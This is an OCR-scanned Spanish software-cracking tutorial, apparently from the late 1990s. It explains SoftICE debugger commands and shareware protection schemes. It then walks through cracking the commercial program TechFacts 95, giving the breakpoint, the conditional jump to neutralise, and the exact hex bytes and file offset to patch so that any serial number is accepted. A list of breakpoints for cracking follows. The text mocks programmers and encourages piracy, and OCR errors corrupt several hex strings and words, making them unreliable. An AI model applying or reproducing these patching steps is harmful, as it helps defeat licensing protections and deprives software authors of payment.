mensaje del tipo mensaggebox. 
bpx dirInstrucción 


Salta al Softice cuando se ejecuta la instrucción que está es la dirección de memoria 
dirInstrucción. 


bpr dirIni dirFin rw 


Salta al Softice cuando hay un acceso de lectura o escritura en las direcciones 
dirIni,dirFin ambas incluidas. Ejemplo bpr 100 109 rw que puesto de otra forma más 
fácil de expresar, nos queda algo como bpr 100 100+9 rw 


sl dir tam'cad' 


Busca la cadena cad a partir de dir hasta dir+tam. Esta sentencia casi siempre tendrá 
este aspecto. Ejemplo s 30:00 1 ffffffff 'cad' . Las comillas son importantes. 30:00 es la 
dirección de comienzo del segmento de datos, osea la dirección de memoria donde están 
los datos del programa y ffffffff es el tamaño del segmento de datos, como veréis hay 
4GB de espacio para almacenar datos. 


d registro 


Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección 
guardada en registro. Ejemplo d eax muestra a lo que apunta eax. 


d dirección 
Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección. 
d nomRutina 


Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección 
donde comienza la rutina nomRutina. 


Impr Pant 


Vuelca el contenido de la pantalla por la impresora, quizás tengas que darle varia veces 
hasta que el buffer de la impresora se llene. 


[ESQUEMAS DE PROTECCION 

Citaré algunas de las técnicas utilizadas por los programadores para proteger su soft. 
- Números de Serie. 

- Cripple Software (software limitado), en diversas variantes: 
* Tiempo limitado a meses , días, minutos.. 

* Número de ejecuciones o usuarios limitado. 

* Funciones deshabilitadas. 

- Protecciones por discos o CD-ROM llave. 

- Protecciones anti herramientas crack 

* Antidebuggers. 

* Antidescompiladores. 

* Antidesensambladores. 

* Encriptación parcial o total. 

- Ninguna de las anteriores. 

¡Acerca de los programadores 

Sólo dos cosas: 


a) En general son perezosos y a veces estúpidos. 

b) Nunca les creas. 

¡La opción a) es clara, sus esquemas de protección son arcaicos, apenas han sufrido 
modificaciones, tan sólo incorporan trucos viejos sobre esquemas bien conocidos. 
Programas en lenguajes de alto nivel tipo C++, Visual Basic, estos compiladores se 
basan en librerías bien conocidas. El programador no tiene el amor propio de crear su 
propia rutina de protección en ensamblador, prefieren dejarla en manos de 
compiladores que crean código ensamblador ineficiente y fácilmente legible. ¿A qué se 
debe todo esto?, a su mentalidad comercial de la vida, no trabajan por placer, son 
esclavos de su trabajo, verdaderos zombies andantes. Lo importante es acabar y pronto 
no importa la calidad del soft o las quejas del estúpido usuario por la lentitud del 
programa o por los "cuelgues". 


Una breve disgresión, no os habéis preguntado por que las versiones de los programas 
¡salen como churros cada 2 días. La respuesta es que se dejan a propósito las cosas sin 


¡hacer o mal hechas para que al cabo de dos días se pueda sacar una flamante nueva 
versión con una leve modificación la cual debes comprar para no quedarse obsoleto, 
Dios mío que abominación! 


Respecto a b) baste decir que siempre tratan de encubrir sus errores con malolientes 
mentiras. 

PROGRAMADORES, leed esto y aprended, pero que digo, no tenéis tiempo ni para 
¡joder, ni para ver por donde os joden....:-) 


ESQUEMAS DE PROTECCIÓN BASADOS EN NÚMEROS DE SERIE 


Esta es una "antigua" técnica de protección utilizada por las toneladas de shareware 
que nos inundan, basta comprarse un CD por 4 perras y ver 650 MB de programas 
basura, en general, deseosos de exprimir nuestras carteras. Veamos como funcionan. 


El programa puede ser total o parcialmente funcional, pero posee estúpidas ventanas 
que nos recuerdan que somos usuarios no registrados, o bien pitidos mal sonantes o 
mensajes perennes proclamando que les mandemos dinero. A veces, pasado cierto 
tiempo o pasado un número de ejecuciones, el programa deja de funcionar. Todo esto 
inconvenientes se resuelven llamando a la casa que construyó el software (imaginad lo 
que puede costar una llamadita o un Fax a un pueblo mal oliente del esto de Utah en 
USA), o bien mandando un e-mail. En cualquier caso hay que indicar el número de 
VISA donde ellos clavarán sus garras para rellenar sus ya nutridas arcas. Una vez 
desplumado recibimos por e-mail o por teléfono una palabra mágica, un número de 
serie, una password, o lo que sea, yo lo llamaré 'pwd''. Esta pwd desbloquea el 
programa y/o elimina las estúpidas ventanas recordatorio. 


Análisis de esquemas con número de serie 


En general existen dos formas en las que trabajan las rutinas de protección de número 
de serie: 


a) Número de serie independiente del usuario. 

b) Números de serie adaptados al usuario. 

a) si extraemos una pwd, ésta servirá a todos los usuarios. Una pwd válida se diferencia 
de una inválida (por las muletas, es un chiste) por la presencia de ciertos caracteres en 
posiciones fijas (p.e. el carácter 8 debe ser una 'C', el 10 un '-'). Toda pwd que cumpla 
las restricciones será una pwd válida. Por norma, casi todas las pass incorporan el 
carácter '-', 2b en hexa. A veces no se requieren caracteres fijos , sino que la suma 
ASCII cumpla cierta condición. Cada letra del alfabeto y cada carácter numérico tiene 
una cantidad asociada, su código ASCII (p.e. par el acute0acutees el 30 en hexa o el 40 
en decimal). La técnica consiste en sumar el código de cada carácter y comprobar la 
suma (que a veces se llama checksum) con una cierta cantidad. Una variante es 
modificar el valor ASCII a través de una tabla que asocia a cada carácter un número 
distinto. 


¡Crackear esto es fácil de crackear: 


cmp suma,sumacorrecta ---->cmp suma,sumacorrecta 

JZ OK eononnonannonnn >jnz ok 

Es posible mezclar las tres técnicas, caracteres fijos, cheksum y modificación del código 
ASCII. En un capítulo próximo veremos un ejemplo de esto. 


b) En este caso se utiliza el nombre, los apellidos, o el nombre de la empresas o todo 
¡junto para generar un pwd. Aquí las técnicas son más imaginativas: coger cierto 
caracteres y repetirlos hasta llegar a un tamaño, usar el código ASCII de ciertas 
caracteres como índice de una tabla de encriptación...En fin, depende de las paranoias 
del programador. Lo cierto es que se debe generar la pwd correcta para nuestros dato 
y ésta se debe comparar con la introducida. Aquí es donde podemos atacar ,en al 
comprobación. Realmente no hace falta crackear, basta con copiar la pwd correcta e 
introducirla como nuestra pwd, o bien crackear las sentencias de comprobación para 
que sirva cualquier pass. Lo primero es mejor ya que nos servirá para futuras 
versiones. 


Se puede mezclar ambas técnicas, como veremos en un capítulo próximo, y generar un 
checksum para una cierta cadena extraída a partir de los datos del usuario y 
comprobar el cheksum de nuestra cadena. 


¿Cómo atacar? 


Antes de ir como unos desposeídos a reventar el programa, es totalmente necesario 
echar un vistazo, ver el posible esquema de protección y los posibles puntos de ataque. 
En general no hay que buscar mucho, los puntos débiles tiene un letrero rojo que dice '' 
Hey estoy aquí”. 


En el caso de los esquemas basados en números de serie, la cosa está clara: esos 
estúpidos mensajes recordatorios son la puerta de entrada. Si somos usuarios no 
registrados aparecen, si nos registramos desaparecen. Por tanto debe haber algo que 
indique cuando deben o no aparecer, este algo es un flag, que no es más que un 
conmutador (como el de una bombilla). Cuando está en ON aparecen los mensajes, 
cuando en OFF desaparecen. En nuestro contexto, un flag no es más que una posición 
dentro de la memoria con un cierto valor. La memoria del ordenador es como un 
cartón de huevos (1 huevo = 1 bit), donde cada hueco tiene un número diferente al que 
se le llama dirección de memoria. En cada hueco puede haber un huevo (valor 1) o no 
haberlo (valor 0). Los agujeros se agrupan, 8 agujeros es un Byte, 1024 Bytes es un 
MegaByte o MB, 1024 MB es un GigaByte o GB, 1024 GB es un TeraByte o TB. Fácil, 
¿verdad?. La memoria está compuesta de bits, estos bits se pueden interpretar de 
muchas formas, flags, datos, instrucciones. Por ejemplo 01010101 puede ser un flag de 
activación, la cadena ''hola'" o lo sentencia pinta la pantalla, depende de como lo 
consideremos. En el caso de tomarlo como instrucciones, se habla de dirección de la 
instrucción en memoria, que no es más que la dirección del primer del primer bit que 
la compone. 


El valor que podemos encontrar en un flag puede variar. Para ON podemos encontrar 
un 1 y para OFF un 0. Se puede usar la llamada lógica negada y tiene en ON un 0 y en 
OFF un 1. Todo lo que se pueda hacer con 0 y 1, se pude reconvertir cambiando los 0 
por 1 y los 1 por 0. Una "mejora" de los programadores es utilizar flags distintos a 0,1, 
cuán inteligentes!. Recuerdo cierto esquema que utilizaba el flag DEAD en 
hexadecimal. Los sistemas de numeración (como el hexadecimal o hexa para abreviar) 
son formas diferentes de contar y de representar cantidades. En base 10, la de toa la 
vida, se empieza en 0 y se acaba en 9. en hexa se comienza en 0 y se acaba en F 
(10=a,11=b,12=c,13=d,14=e,15=f). 


Veamos algo más práctico: 
cmp ax,flag; Compara el valor de ax con el valor del flag 
¡jz mensajes; Si son iguales muestra los mensajes. 


sigue: inc dx; Continúa normalmente. 


¡mp sigue;Salta y continua normalmente. 


Este puede ser un esquema típico. Dependiendo del valor del flag se muestran los 
mensajes o no. 


Llegamos a la parte interesante, cada mensaje recordatorio debe tener una 
comprobación como la del ejemplo. Basta con analizar los mensajes recordatorio y 
descubrir la dirección de memoria del flag. Pero quién narices rellena el flag?. 
Obviamente debe haber como mínimo dos inicializaciones, una al comienzo de la 
ejecución del programa que pone al flag a OFF y la rutina de protección que lo debe 
poner a ON si la pwd es correcta. ¿Me sigues hasta ahora?. 


Es fácil ahora saber donde atacar, un crack elegante sería poner la inicialización al 
comienzo del programa a ON en vez de OFF. Recuerda esto: ' Un buen cracker debe 
¡ser ante todo elegante y sutil, nada intrusivo". 


Otro punto de ataque 


Hasta ahora hemos visto que analizando los estúpidos mensajes se puede conocer la 
dirección de memoria del flag y a partir de ahí su inicialización. Pero en los esquemas 
basados en números de series existe un punto de entrada más claro aún que los flags: la 
propia rutina de protección. Veamos un método sencillo para llegar a ella. 


| 
¡Si uno se va a la opción de registro e introduce un número de serie falso, aparecerá una 
estúpida ventana indicando que nos hemos equivocado: ''Soryy your password is 
¡invalid'' o algo parecido que traducido al cristiano es '"Tío te ha equivocado, 
JAAARL". Esto no es una vía de entrada, esto es una autopista de 1GB de carriles. 
¡Basta con pensar un poco, quién es la encargada de mandar este mensaje? 
evidentemente la propia rutina de protección, interesante verdad?. Ya sólo queda 
encerrar la rutina, ver como trabaja , cambiar un par de bytes (siempre de la forma 
más elegante posible) y listo, programa crackeado. 


¡Comparación de ataques 


¡¿Qué crack es mejor?, el de flags o de la rutina de protección?. Esto depende en gran 
¡medida de programa, de tus habilidades y del tipo de que dispongas. Con la rutina de 
¡protección se puede analizar en profundidad el esquema, ver como trabaja y hasta 
extraer tu propio número de serie, osea el número de serie que la empresa te da si te 
registras, pero esto requiere tiempo y esfuerzo, obteniendo una satisfacción moral e 
intelectual. Además, en la próxima versión del programa est pwd posiblemente 
funcionará y no necesitarás crackear de nuevo. Mediante cracks al flag, se requiere un 
tiempo menor, pero la próxima versión habrá que crackearla de nuevo (no importa 
¡seguro que estos estúpidos programadores habrán seguido la mismo patrón de 
protección). Un crack a la rutina de exige un conocimiento profundo de la misma, lo 
¡que puede llevar a tu propio generador de claves (igualito o seguramente mejor que el 
tiene la empresa). 


CÓMO CRACKEAR TECHFACTS 95: 


Objetivo: TechFacts 95. 

Versión: 1.30 3/7/97 

¡Nombre del ejecutable: Teckfct95.exe 

Website: http://ourworld.compuserve.com/homepage/deansoft 
'Tamaño del ejecutable: 1.251.840 bytes. 

'Tipo de protección: Por número de serie. 

Dificultad: ameba. 

¡Tiempo de crackeo: 2 minutos. 

Herramientas: Softlce 3.0 y Editor Hexadecimal. 


¡Siguiendo las recomendaciones de +ORC empezaremos por crackear nuestras propias 
herramientas crack. El programa en cuestión es una pequeña joya que nos permitirá, 
entre otras muchas cosas, rastrear las acciones de un determinado programa, buscar 
¡cadenas de caracteres en ficheros, trabajar con dll.. Generalmente,lo utilizo para 
¡rastrear programas de instalación, obteniendo información de los ficheros creados, las 
entradas de registro añadidas o borradas, ... 


Manos a la obra. El programa es un ejecutable que no necesita otro fichero para 
funcionar (cosa rara en estos días). Así pues, arranquemos el programa veamos lo que 
ocurre. Aparece una horrible ventana diciendo que utilicemos nuestra VISA o 
MASTERCARD y que soltemos los 19,99 dólares (unas 2500 pesetas) que tenemos para 
ir a tomar cervezas. 


Echemos un vistazo al programa. Entre otras cosas, hay una opción en 
TOOLS/WATCH SYSTEM, que nos permite rastrear un programa. En HELP/HELP 
TOPICS/ORDER FORM aparece una hoja de registro en la que nos avisa de que 
además tenemos que paga 2 dólares para gastos de envío, ¡cómo si costará 250 pelas 
enviar un mail con el número de serie!. 


En HELP/ABOUT TECHFACTS 95 encontramos un botón USE REG KEY. Aquí es 
donde tenemos que introducir nuestro Nombre (First name), apellidos (Last name) y el 
número de serie correspondiente que lo recibiremos por mail si pagáramos 19,99 dólares 
más 2 dólares de gastos de envío. Empecemos por aquí. 


Pongamos un nombre, un apellido y un número cualquiera y pulsemos el botón 
REGISTER. Entonces escuchamos un pitido y aparece una ventana de mensaje diciendo 
REGISTRATION KEY FAILED. Ahora ¡pensemos un poco!, apliquemos un poco de 
ZEN CRACKING. 


Lo único anormal es el pitido. Si tu fueras un programador y quisieras que pitará tu 
"cacharro" tienes dos opciones construirte un bonito programa en ensamblador que lo 
haga, o bien utilizar una función de pitido presente en alguna de las vomitivas librerías 
de funciones, también llamadas API. ¿ Qué piensas que ha hecho nuestro ''vago" 
programador ?. ¡Bingo! ha utilizado la función MessageBeep de la librería 
USER32.DLL. Este un punto de ataque muy claro, aunque existen muchos otros. 


Apliquemos la técnica LIVE, es decir, utilizaremos el Softlce. Reinicialicemos nuestro 
ordenador en modo Ms-Dos, lancemos el WinlIce y volveremos a Windows. 


Abramos el LOADER de Softlce y en FILE/OPEN MODUL E seleccionemos el fichero 
Tekfct95.exe. Pulsemos Load o el botón con las ruedecillas dentadas. Nos aparece una 
ventana de mensaje del Softlce diciendo que no puede cargar la tabla de símbolos, 
pulsemos el botón SÍ y aparecemos directamente en el SoftIce con la pantalla en modo 
texto. En este momento nos encontramos en la primera sentencia de nuestro programa. 
Pulsemos bpx messagebeep con esto tomaremos el control antes de que aparezca el 
pitido. Con Ctrl-D volvemos a Windoce y el programa sigue ejecutándose normalmente 
pero con un cebo en messagebeep. Elegimos la opción de registro y escribimos cualquier 
cosa en nombre, apellidos y número de serie, pulsamos el botón y aparecemos de bruces 
en: 


USER32'MessageBeep 


/014F:BFF623C1 B148 MOV CL,48 **** Aparecemos aquí.**** 
014F:BFF623C3 EB12 JMP BFF623D7 

Si pulsamos en este momento F12(continuar hasta un RET) nos situaremos en: 
014F:0047BA65 EB11 jmp 0047BA78 

014F:0047BA67 6A30 push 00000030 

014F:0047BA69 E8S22A7F8FF Call 00406190 **** Llamada a MessageBeep**** 
014F:0047BA6E B8BCBB4700 mov eax, 0047BBBC 


014F:0047BA73 ES24BEFBFF call 0043789C **** Pintamos la ventana de error **** 
En tu ordenador las direcciones de memoria pueden ser diferentes. 


¡Sintamos el código!. Estamos en mitad de las sentencias de error, lo que implica que 
debe haber un salto condicional a este conjunto de sentencias de error. El salto debe ser 
condicional porque en caso de haber metido correctamente el número de serie 
¡habríamos obtenido algún tipo de mensaje de felicitación. Así pues, sólo debemos 
encontrar ese salto condicional y modificarlo. 


Miremos por encima de la dirección 014F:0047BA69, nos encontramos en 
014F:0047BA65 un salto incondicional jmp 0047BA78, en una ejecución normal nunca 
llegaríamos a 0047BA67 ya que siempre saltaríamos a 0047BA78. Por tanto, lo que 
debemos buscar es un salto condicional a la dirección 0047BA67. Si volvemos hacia atrás 
jun poco con los cursores encontramos este bonito salto 


014F:0047B934 ES9B73F8FF call 00402CD4 
014F:0047B939 0F8528010000 jne 0047BA67 **** ¡BINGO! +++ 
014F:0047B93F 8D45B7 lea eax, dword ptr [ebp-49] 


Hemos encontrado el salto, sólamente hay que modificarlo. Fijaos que el salto se produce 
después de una llamada a la rutina call 00402CD4 apostaría el pellejo a que esta es una 
rutina para comprobar si tu número de serie es correcto. Si no es igual (jne) salta a las 
sentencias de error. Si es igual continua ejecutándose. Hay muchas formas de invertir el 
salto: 


1.- Cambiar 0F8528010000 jne 0047BA67 por 
0F8500000000 jne 0047B93F 
2.- Cambiar 0F8528010000 ¡ne 0047BA67 por 


[404840484048 inc eax,dec eax, inc eax, dec eax, inc eax, dec eax 


La 1 es un salto neutro, sea igual o no siempre se ejecuta la sentencia siguiente. La 2 es la 
preferida por +ORC, cambia el salto por un conjunto de parejas incrementar - 
decrementar que dejan el registro eax sin cambios en su contenido. 


Solamente hay que tener en cuenta dos cosas para modificar el código, sustituir siempre 
el mismo número de bytes (cambias 2 bytes por 2 bytes) y que tus modificaciones sean 
una sentencia en ensamblador correcta. 


El Softlce nos permite hacer cambios On-Fly, es decir, en ese mismo instante, pero el 
¡cambio no es permanente. Para ello, nos vemos obligados a utilizar algún editor 
hexadecimal, con el cual abriremos el fichero ejecutable, y buscaremos la cadena en 
hexadecimal E89B73F8FF0F8528010000 y la cambiaremos por 
ES9B73F8FF0E8500000000. La cadena se encuentra en el offset 0X7AD34(los números 
en hexa llevan delante un 0X) que en decimal es 503092. 


Así pues tenemos que irnos al byte 503092 de fichero ejecutable y comenzar a hacer 
cambios. 


Ahora tendremos el ejecutable parcheado, si nos registramos nuestro número de serie 
¡siempre será aceptado. 


'Un crack no es más que un pequeño programa que abre un fichero y cambia un par de 
bytes por otros. ¡Nada más sencillo! Sólo hay que saber qué bytes hay que cambiar. 
Cuantos menos bytes se cambien más elegante será el crack. 


¡Si habéis seguido todos los pasos habéis crackeado vuestro primer programa. Aun nos 
¡sois cracker pero estáis en la buena senda. Sólo hay que poner interés. 


¡Para gentes más avezadas, comentaré que el flag de activación se iniciativa 
correctamente en :0047BA5E mov byte ptr [004CF31A],00 La rutina de protección es 
bastante patética, con gran cantidad de código inactivo. Empieza en :47B5C0. 
Obviamente se podría haber hecho algún otro tipo de pero este es el más simple (se 
podría haber obtenido el número de serie real, o haber creado un generador de 
claves).El programador ha puesta a "pelo" la dirección de retorno en :47BA3F push 
47BA54. Es un ridículo truco que nos hará perdernos si continuamos ejecutando 
¡mnormalmente, por ello es conveniente pulsar ''F12'" y mirar hacia por encima sin 
ejecutar sentencias. 


Espero vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 
¡En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +0RC en la red. 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


Instalación del Soft-Ice 3.22 para W95 


e Tener el Softlce 3.20, y la actualización a la versión 3.22 (ver sección de 
hErrAmiEntAs para conseguirlos) 


e Ejecutar el programa de instalación (3.20), y cuando lo pida, decirle que 
no actualize el Autoexec.Bat, ya que es mejor hacerlo después a mano. 
e Ejecutar el programa de actualización (3.22). 


e Editar el AutoExec.Bat, y añadir al final : 
CHOICE /T:N,3 "Cargar Debugger Soft-Ice 3.22 " 
IF ERRORLEVEL 2 GOTO SEGUIR 
CASTWOSWINICE.EXE 
¡SEGUIR 


e Al arrancar el Pc, tendremos 3 segundos para contestar si queremos cargar 
el Softlce. 
(Se puede cambiar el tiempo y/o la opción por defecto con el parámetro 
/T:OpcionDefecto,Segundos ) 
Si hemos pedido cargar el debugger, el windows arrancará normalmente, 
pero al pulsar Ctrl-D tiene que aparecer el entorno del debugger, y a partir 
de aquí ya es otra historia.... 


e Para ejecutar el Softlce desde una "ventana" de guindous, hay que activar 
la casilla de Universal Video Driver, cuando se configura la targeta 
gráfica. 

Se puede volver a reconfigurar con el "Display Adapter Setup" que se 
instala juntamente con el Softlce, y dejarlo como mejor nos vaya. 


Configuración del entorno (WinIce.Dat) 


Los parametros de configuración estan en el fichero Winlce.Dat, y se puede acceder a ellos también 
desde el pgm Symbol Loader, en la opción de SoftICE Initialization Settings. 


Algunos comandos se pueden teclear directamente desde el Softlce, o se pueden tener en el 
WinIce.Dat para que se ejecuten al arrancar. 
Probad primero, y lo que más os interese lo poneis en la linia INTT="X;" 


CODE ON : Para ver los bytes en hexa de cada instrucción asm. 
LINES %+ : Número de linias para la pantalla. 

WR : Para ver/ocultar la ventana de Registers. 

WL : Para ver/ocultar la ventana de Locals. 

WC $ : Número de linias para la ventana de Code. 

WD * : Número de linias para la ventana de Data. 

WW * : Número de linias para la ventana de Watch. 


Un ejemplo de configuración podría ser : 
INIT="CODE ON;¿LINES 60;WR;WL;WD 13;WC 25;WATCH eax;¿WATCH *eax;¿X;¿" 


Estando en el Softlce, el tamaño de las ventanas también se puede modificar con el ratón. 
Y también se pueden cambiar los colores con el comando COLOR 


Configuración del entorno (WinIce.Dat) 


Para poder interceptar llamadas a funciones externas del programa que estamos 
traceando, hay que retocar unas linias en el WinIce.Dat 

Se tienen que "exportar" los ficheros que contengan las funciones que queramos 
pillar. Los típicos que conviene tener para interceptar las llamadas al Api de 
windows son : 


EXP=c:windowsAsystemlkerne1l32.d11 
EXP=c:windows1systemluser32.d11 
EXP=c:windowsAsystemlgdi32.d11 
EXP=c:windowssystemladvapi32.d11 


Estas linias las vereis en el WinIce.Dat, pero con un puntoycoma delante que las 
inactiva. 
Tan sólo quitar el ; y retocar el path del windows si no se ajustase a vuestro Pc. 


Sin estos "Exports", no se podria poner un BreakPoint tipo BPX 
GetWindowTextA, que son muy útiles para bastantes desprotecciones. 


> y 
VO 


Traceando .... 


Tenemos varias opciones para ir avanzando por el programa : 


T (F8): Ejecuta la instrucción actual y se para en la siguiente. 
P (F10): Igual que T, pero no entra en los Call. 

P RET (F12): Ejecuta hasta una instrucción de retorno (RET). 

G address (F11): Ejecuta hasta la dirección 'address'. 


Husmeando .... 


Para poder ver o buscar lo que hay en memoria : 


D address [L length] : Muestra el contenido de la memoria. 
S address L length data-string: Busca un valor en la memoria RAM. 


Ejemplos : 

D EAX => para ver qué hay en EAX 

D *EAX => para ver qué hay en la dirección que apunta EAX 
D EBP-200 ==> para ver qué hay en EBP-200 

D 000F:A8A57 ==> para ver qué hay en la dirección F:A8A57 


S 0 L FFFFFFFF 'clave' => Busca el texto 'clave' por toda la memoria. 
S 0 L FFEFFFFFF A1,41 => Busca 'A141' en hexadecimal por toda la memoria. 
S es:di+10 L ecx A1,41 => Busca 'A141' en hexa. desde es:di+10 hasta (es:di+10)+ ecx 


- 
Vi 


El uso de los BreakPoints, o Puntos de Ruptura es muy útil para parar el programa en 
un momento dado. Ponerlos bien significa ahorrarse ver muchas linias de código 
inútil. 

Para manipular los BreakPoints tenemos : 


Parando .... 


BL : Muestra los BreakPoints que hemos puesto. 


BD % : Desactiva el BreakPoint número *+ (* para todos). 
BE % : Activa el BreakPoint número + (* para todos). 
BC %* : Elimina el BreakPoint número *+ (* para todos). 


Algunos de los BreakPoints disponibles son : 


BPX address/symbol : Parada por ejecución. 

BPIO [-h] port [R|W|RW] : Parada por acceso a puerto E/S. 
BPINT interrupt-number : Parada por interrupción. 

BMSG hWnd [L] begin-msqg : Parada por mensaje. 

BPM address : Parada por acceso a memoria. 


Para ver ejemplos y coger ideas de Puntos de Ruptura, ver el documento de 


BreakPoints. 
- 
Vi 


Pidiendo .... 


Con el Softlce disponemos de varios comandos para obtener información del Sistema. 
Por ejemplo, 


WMSG : Muestra los mensajes de windows. (wm_gettext, wm_lbuttondown,.. 


TASK : Muestra las tareas actualmente en ejecución. 
HWND nombreTask : Muestra información sobre los "windows handles". 
EXP : Muestra/Carga las funciones "exportadas" de las DLlLs. 


Supongamos que queremos interceptar qué se hace con una clave que acabamos de introducir en un 
programa. 

Se podría hacer (entre otras maneras) : 

TASK => para ver el nombre del programa. 

HWND nombrePgm => para ver que apuntadores hay para ese programa. 

BMSG apuntador mensaje ==> para poner un BreakPoint. 


Ej: interceptar para la tarea prueba32, el "Window-Handle" 2C0 (Class_Name: Edit, que corresponde al 


cuadro de texto) 
HWND prueba32 
BMSG 2C0 wm_gettext 
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Comandos existentes en el SoftIce 3.22 


SETTING BREAK POINTS 


BPM, BPMB, BPMW, BPMD 
- Breakpoint on memory access 


BPR - Breakpoint on memory range 
BPIO - Breakpoint on 1/0 port access 
BPINT - Breakpoint on interrupt 

BPX - Breakpoint on execution 

BMSG - Breakpoint on Windows message 
BSTAT - Breakpoint Statistics 

CSIP - Set CS:EIP range qualifier 


MANIPULATING BREAK POINTS 


BPE - Edit breakpoint 

BPT - Use breakpoint as a template 
BL -= List current breakpoints 

BC - Clear breakpoint 

BD - Disable breakpoint 

BE - Enable breakpoint 

BH - Breakpoint history 


DISPLAY/CHANGE MEMORY 


R - Display/change register contents 
U - Un-assembles instructions 
D, DB, DW, DD, DS, DL, DT 
- Display memory 
E, EB, EW, ED, ES, EL, ET 


- Edit memory 


PEEK - Read from physical address 

POKE - Write to physical address 

PAGEIN -— Load a page into physical memory (note: not always safe) 
H - Help on the specified function 

? - Evaluate expression 

VER - SoftICE version 

WATCH -— Add watch 


FORMAT - Change format of data window 
DATA Change data window 


DISPLAY SYSTEM INFORMATION 


GDT - Display global descriptor table 

LDT - Display local descriptor table 

IDT - Display interrupt descriptor Table 
TSS - Display task state segment 

CPU - Display cpu register information 
PCI - Display PCI device information 

MOD - Display windows module list 

HEAP - Display windows global heap 

LHEAP  - Display windows local heap 

VXD - Display windows VxD map 

TASK - Display windows task list 

VCALL - Display VxD calls 

WMSG - Display windows messages 

PAGE - Display page table information 

PHYS - Display all virtual addresses for physical address 
STACK -— Display call stack 

XFRAME - Display active exception frames 
MAPV86 - Display v86 memory map 

HWND - Display window handle information 
CLASS -— Display window class information 
VM - Display virtual machine information 
THREAD - Display thread information 

ADDR - Display/change address Contexts 
MAP32 -— Display 32 bit section map 

PROC - Display process information 

QUERY -— Display a processes virtual address space map 
WHAT - Identify the type of an expression 


OBJDIR - Display info about an object directory 
DEVICE - Display info about a device 


DRIVER - Display info about a driver 
FOBJ - Display info about a file object 
IRP - Display info about a IRP 


I/O PORT COMMANDS 


1, IB, IW, ID 
- Input data from 1/0 port 
O, OB, OW, OD 
-— Output data to I/O port 


FLOW CONTROL COMMANDS 


Xx - Return to host debugger or program 

G - Go to address 

T - Single step one instruction 

P - Step skipping calls, Int, etc. 

Go to current cursor line 

EXIT - Force an exit to current DOS/Windows program 
GENINT Generate an interrupt 

HBOOT System boot (total reset) 


paa 

H 

ps) 

H 
l 


l 


MODE CONTROL 


I1HERE - Direct INT1 to SoftICE 
IBHERE - Direct INT3 to SoftICE 


ZAP - Zap embedded INT1 or INT3 
FAULTS - Enable/disable SoftICE fault trapping 
SET - Change an internal variable 


CUSTOMIZATION COMMANDS 


PAUSE - Controls display scroll mode 

ALTKEY - Set key sequence to invoke window 

FKEY - Display/set function keys 

DEX - Display/assign window data expressions 
CODE - Display instruction bytes in code window 
COLOR - Display/set screen colors 

ANSWER -— Auto-answer and redirect console to modem 
DIAL - Redirect console to modem 


SERIAL - Redirect console 


TABS - Set/display tab settings 

LINES -— Set/display number of lines on screen 
WIDTH - Set/display number of columns on screen 
PRN - Set printer output port 

PRINT-SCREEN key - Dump screen to printer 

MACRO - Define a named macro command 


UTILITY COMMANDS 


A - Assemble code 

S - Search for data 

F - Fill memory with data 
M - Move data 

E - Compare two data blocks 


LINE EDITOR KEY USAGE 


(Up) -= Recall previous command line 
(Down) -— Recall next command line 
(Right)- Move cursor right 

(Left) - Move cursor left 


BKSP - Back over last character 


HOME 
END 
INS 
DEL 
ESC 


Start of line 

- End of line 

- Toggle insert mode 

- Delete character 

- Cancel current command 


SCROLLING KEY USAGE 


PageUp - Display previous page of display history 
PageDn - Display next page of display history 
A1t- (Up) = Scroll data window down one line 
Alt-(Down) - Scroll data window up one line 
Alt-PageUp - Scroll data window down one page 
Alt-PageDn - Scroll data window up one page 
Ctrl-PageUp - Scroll code window down one page 
Ctrl-PageDn - Scroll code window up one page 

Ctr1- (Up) -= Scroll code window down one line 


Ctrl1- (Down) 


Scroll code window up one line 


WINDOW COMMANDS 


- Toggle code window 

- Toggle data window 

- Toggle floating point stack window 
- Toggle locals window 

- Toggle register window 

- Toggle watch window 

- Enable/disable code window 

- Locate current instruction 


WINDOW CONTROL 


RS 
ALTSCR 
FLASH 


- Clear window 

-— Restore program screen 

- Change to alternate display 
Restore screen during P and T 


SYMBOL/SOURCE COMMANDS 


SYM 
SYMLOC 
EXP 
SRC 
TABLE 
FILE 
SS 
TYPES 
LOCALS 


- Display symbols 

- Relocate symbol base 

- Display export symbols 

- Toggle between source, mixed € code 

- Select/remove symbol table 

- Change/display current source file 

- Search source module for string 

-= List all types, or display type definition 
- Display locals currently in scope 


BACK TRACE COMMANDS 


SHOW 
TRACE 


- Display from backtrace buffer 
- Enter back trace simulation mode 


XT - Step in trace simulation mode 


XP - Program step in trace simulation mode 
XG - Go to address in trace simulation mode 
XRSET -— Reset back trace history buffer 


SPECIAL OPERATORS 


- Preceding a decimal number specifies a line number 


S - Preceding an address specifies SEGMENT addressing 
$ - Preceding an address specifies SELECTOR addressing 
Q - Preceding an address specifies indirection 

Went 
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Introducción 


Una de las habilidades más importantes para desproteger un programa es saber 
Dónde, Cuándo y Qué Tipo de BreakPoints usar. 

En caso contrario, acabas perdido entre cientos de lineas de código, sin poder 
encontrar la rutina de protección buscada. 


Las posibilidades de BreakPoints son infinitas, pero hay algunos que se usan 
frecuentemente para las desprotecciones. 


Tener en cuenta si el programa debugado es de 16 o 32 bits para los Puntos de 
Ruptura en las llamadas al Api de windows. 

Por ejemplo, BPX GetWindowText (para 16 bits) y BPX GetWindowTextA (para 
32 bits). 

O sea, que los programas para W95 de 32 bits llevan la A al final. 


> 
Wer 


Ejemplos de BreakPoints útiles para el cracking 


1)General Purposes 
BPX messagebox 

BPX getdlgitemtext 
BPX getwindowtext 
BPX hmemcpy 

BPX showwindow 

BPX updatewindow 
BMSG XXXX wm_gettext 
BMSG XXXX wm_command 
BMSG XXXX wm_move 


2) Time Related 

BPINT 21 if ah==2A (DOS) 
BPX getlocaltime 

BPX getfiletime 

BPX getsystemtim 


3)Register Flag Related (e.g. Flag on EAX) 


BPX cs:eip if EAX==0 (SICE 3.x) 


4) Memory Flag Related (e.g. Flag on 0030:000045AA) 


BPMB cs:eip rw if 0x30:0x45AA==0 (SICE 3.x) 


5) "Hear The Echo" Technique Related 


BPX 0x30:0x45AA do "d 0x30:0x44BB" (SICE 3.x) 
BPX CS:0x66CC do "? EAX" (SICE 3.x) 


6) CD-ROM and Disk Based Schemes 


